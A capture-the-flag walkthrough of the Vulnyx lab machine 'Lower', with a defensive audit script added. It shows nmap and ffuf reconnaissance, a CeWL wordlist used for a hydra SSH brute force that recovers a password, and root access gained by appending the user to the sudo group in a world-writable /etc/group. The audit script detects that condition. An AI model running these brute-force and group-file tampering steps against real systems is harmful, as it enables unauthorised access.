Vlx_Lower

Box source: https://vulnyx.com/

Difficulty: Low

I. Information Gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 09:20 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00033s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00082s latency).
MAC Address: 08:00:27:9E:AE:CF (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.85
Host is up (0.00090s latency).
MAC Address: 08:00:27:E2:E9:59 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.52 seconds

Target IP: 192.168.2.85

2. Port scan

(1) Full TCP port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.85
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 09:21 +0800
Nmap scan report for 192.168.2.85
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:E2:E9:59 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.14 seconds

Open ports: 22, 80

(2) Service and version scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.85
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 09:21 +0800
Nmap scan report for 192.168.2.85
Host is up (0.0012s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Did not follow redirect to http://www.unique.nyx
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:E2:E9:59 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.54 seconds

(3) UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.85
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 09:22 +0800
Nmap scan report for 192.168.2.85
Host is up (0.0015s latency).
All 100 scanned ports on 192.168.2.85 are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 08:00:27:E2:E9:59 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 58.46 seconds

II. Web Penetration

1. Domain discovery

Port 80 answers with a redirect that reveals a new domain name

┌──(root㉿kali)-[~/miaosec]
└─# curl -i http://192.168.2.85
HTTP/1.1 302 Found
Date: Fri, 13 Mar 2026 01:22:42 GMT
Server: Apache/2.4.62 (Debian)
Location: http://www.unique.nyx
Content-Length: 0
Content-Type: text/html; charset=UTF-

Add it to /etc/hosts

┌──(root㉿kali)-[~/miaosec]
└─# echo "192.168.2.85 www.unique.nyx" >> /etc/hosts

Visiting www.unique.nyx only gives a "could not redirect" page, so the default virtual host holds nothing useful

2. Subdomain brute force

Brute-force virtual host names by fuzzing the Host header

┌──(root㉿kali)-[~/miaosec]
└─# ffuf -u http://www.unique.nyx -H "Host: FUZZ.unique.nyx" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 20 -ac

tech [Status: 200, Size: 19766, Words: 4127, Lines: 453, Duration: 81ms]
:: Progress: [100000/100000] :: Job [1/1] :: 2702 req/sec :: Duration: [0:01:01] :: Errors: 0 ::

Found the virtual host tech.unique.nyx; add it to /etc/hosts

┌──(root㉿kali)-[~/miaosec]
└─# echo "192.168.2.85 tech.unique.nyx" >> /etc/hosts

3. CeWL

Visit tech.unique.nyx

Browsing the page turns up three candidate usernames: tom, kathren, lancer. Save them one per line in user.txt for the SSH brute force below.

Use CeWL to extract the page's words into a wordlist

CeWL (Custom Word List generator) is a Ruby program that spiders a given URL to a specified depth and returns a list of words that password crackers such as John the Ripper, Medusa and WFuzz can use. CeWL ships with a companion command-line tool, FAB, which uses the same metadata-extraction techniques to build author/creator lists from already downloaded files.
  • -m6: only collect words of at least 6 characters
  • --with-numbers: by default CeWL ignores words containing digits; this option includes them in the wordlist
┌──(root㉿kali)-[/tmp]
└─# cewl -m6 "http://tech.unique.nyx/" --with-numbers -w pass.dic
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

III. SSH Brute Force

Brute-force SSH with hydra (user.txt holds the three usernames, pass.dic the CeWL wordlist)

┌──(root㉿kali)-[/tmp]
└─# hydra -t 4 -L user.txt -P pass.dic ssh://192.168.2.85 -F -I
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-13 10:08:19
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 399 login tries (l:3/p:133), ~100 tries per task
[DATA] attacking ssh://192.168.2.85:22/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 319 to do in 00:04h, 4 active
[STATUS] 75.00 tries/min, 225 tries in 00:03h, 174 to do in 00:03h, 4 active
[22][ssh] host: 192.168.2.85 login: lancer password: NewY0rk
[STATUS] attack finished for 192.168.2.85 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-13 10:13:04

Valid credentials found: lancer:NewY0rk

IV. Shell as lancer

Log in over SSH with the recovered credentials

┌──(root㉿kali)-[~]
└─# ssh lancer@192.168.2.85
The authenticity of host '192.168.2.85 (192.168.2.85)' can't be established.
ED25519 key fingerprint is: SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.85' (ED25519) to the list of known hosts.
lancer@192.168.2.85's password:
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
lancer@lower:~$ id
uid=1000(lancer) gid=1000(lancer) groups=1000(lancer)

V. Privilege Escalation

Look for world-writable regular files (the find below prunes /proc and /sys and prints files whose other-write bit is set)

lancer@lower:/$ find / \( -path /proc -o -path /sys \) -prune -o -perm -o=w -type f -print 2>/dev/null
/etc/group

/etc/group is world-writable, so append a line that puts the current user into the sudo group (gid 27 on Debian)

lancer@lower:/$ echo 'sudo:x:27:lancer' >> /etc/group

This appends a second sudo line rather than editing the existing one, but supplementary groups are resolved by scanning every line of /etc/group at login, so reconnect for it to take effect; groups now lists sudo

lancer@lower:~$ groups
lancer sudo

Escalate with sudo (the prompt takes lancer's own password, NewY0rk); root obtained

lancer@lower:~$ sudo su -
[sudo] password for lancer:
root@lower:~# id
uid=0(root) gid=0(root) grupos=0(root)
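The escalation above rests on two conditions a hardening or incident-response check should catch: a group file with the other-write bit set, and a privileged group whose membership grew, here through a duplicate "sudo" line that a normal usermod would never create. The following POSIX sh audit is an added example, not part of the original writeup; the sample group file it runs against is constructed to mirror the state of /etc/group after the append, and the audit_group_file function, its name and the "sudo" argument are the example's own choices. Point it at the live file with audit_group_file /etc/group sudo.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit a group(5) file for the
# conditions that let lancer reach root on this box.

# Constructed sample: /etc/group as it looks after the writeup's append.
# The second 'sudo' line is the one a normal 'usermod -aG sudo' would never create.
SAMPLE_GROUP='root:x:0:
sudo:x:27:
lancer:x:1000:
sudo:x:27:lancer'

# is_world_writable FILE: true if any "other" user may write the file.
# find -perm with an octal mask is POSIX, unlike the -o=w form used in the writeup.
is_world_writable() {
    [ -n "$(find "$1" -prune -perm -002 -print 2>/dev/null)" ]
}

# duplicate_groups FILE: print every group name that occurs on more than one line.
duplicate_groups() {
    cut -d: -f1 "$1" | sort | uniq -d
}

# group_members GROUP FILE: print the union of members across every line that
# names GROUP. Login resolves supplementary groups by scanning all lines, which
# is why the appended duplicate took effect after reconnecting.
group_members() {
    awk -F: -v g="$1" '
        $1 == g && $4 != "" { n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i] }
    ' "$2" | sort -u
}

# audit_group_file FILE GROUP: exit 0 when FILE is not world-writable, has no
# duplicate group lines and GROUP has no members; exit 1 otherwise. Findings go
# to stderr so callers only need the exit status.
audit_group_file() {
    f=$1; g=$2; rc=0
    if is_world_writable "$f"; then
        echo "FINDING: $f is world-writable" >&2; rc=1
    fi
    dups=$(duplicate_groups "$f")
    if [ -n "$dups" ]; then
        echo "FINDING: duplicate group lines in $f: $(echo "$dups" | tr '\n' ' ')" >&2; rc=1
    fi
    members=$(group_members "$g" "$f")
    if [ -n "$members" ]; then
        echo "FINDING: $g has members in $f: $(echo "$members" | tr '\n' ' ')" >&2; rc=1
    fi
    return $rc
}

# Stand-alone demo on the constructed sample (a temp file, never the live /etc/group).
demo_file=$(mktemp)
printf '%s\n' "$SAMPLE_GROUP" > "$demo_file"
chmod o+w "$demo_file"
audit_group_file "$demo_file" sudo || echo "sample would have let lancer reach root"
rm -f "$demo_file"
```

On a clean Debian install the sudo line is "sudo:x:27:" with no members and /etc/group is mode 0644, so the audit exits 0; any member in sudo, a second sudo line, or the other-write bit turns it into a finding.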

VI. Flags

root@lower:~# cat /root/root.txt /home/lancer/user.txt 
b2daf29b8bd041ea1787f345799b61b4
bbb446e708226206823f2f74b9dc540c

Vlx_Lower
http://miao-sec.github.io/Vulnyx/Vlx-Lower/
Author: Miao
Published: March 13, 2026
License: BY-MIAO